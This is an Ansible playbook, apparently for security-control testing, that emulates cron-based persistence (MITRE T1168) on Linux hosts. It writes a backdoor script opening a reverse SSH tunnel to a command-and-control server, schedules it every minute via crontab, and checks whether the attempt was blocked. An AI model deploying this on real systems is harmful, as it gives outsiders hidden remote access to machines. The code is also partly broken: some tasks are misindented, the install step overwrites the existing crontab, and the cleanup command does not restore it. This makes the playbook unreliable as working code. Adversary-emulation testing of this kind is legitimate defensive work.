# attack_technique: T1168
# victim public key must be added to authorized_host files on c&c
# On c&c run: ssh -pREMLIS localhost
- name: Cron Job
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
          - name: createfile
            file: path={{ backdoor_script }} state=touch
          - name: createscript
            shell: |
                echo "sleep 5" >> {{ backdoor_script }}
                echo "REMLIS={{ cnc_port }}" >> {{ backdoor_script }}
                echo "REMUSER={{ cnc_user }}" >> {{ backdoor_script }}
                echo "HOSTS=\"{{ cnc_fqdn }}\"" >> {{ backdoor_script }}
                echo "ssh -R \${REMLIS}:localhost:22 -N \${HOSTS} -l \${REMUSER}" >> {{ backdoor_script }}
                chmod 755 {{ backdoor_script }}
          - name: crontab
            shell: |
                crontab -l > /tmp/crontmp
                echo "* * * * * {{ backdoor_script }}" > {{ crontab_task }} && crontab {{ crontab_task }}
          - name: Wait before status check
            tags: always
            wait_for: timeout=10
            delegate_to: localhost
         
           - name: check if crontab exist
            tags: always
            shell: |
              crontab -l
            register: T1168
          - name: check if playbook was blocked
            tags: always
            debug: msg="Playbook Completed#T1168#blocked#linux#"
            when: '"{{ backdoor_script }}" not in T1168.stdout'      
          - name: check if playbook was successfull
            tags: always
            debug: msg="Playbook Completed#T1168#passed#linux#"
            when: '"{{ backdoor_script }}" in T1168.stdout'
          - name: cleanup
            shell: |
            crontab -l < /tmp/crontmp
            rm {{ backdoor_script }}
            rm {{ crontab_task }}

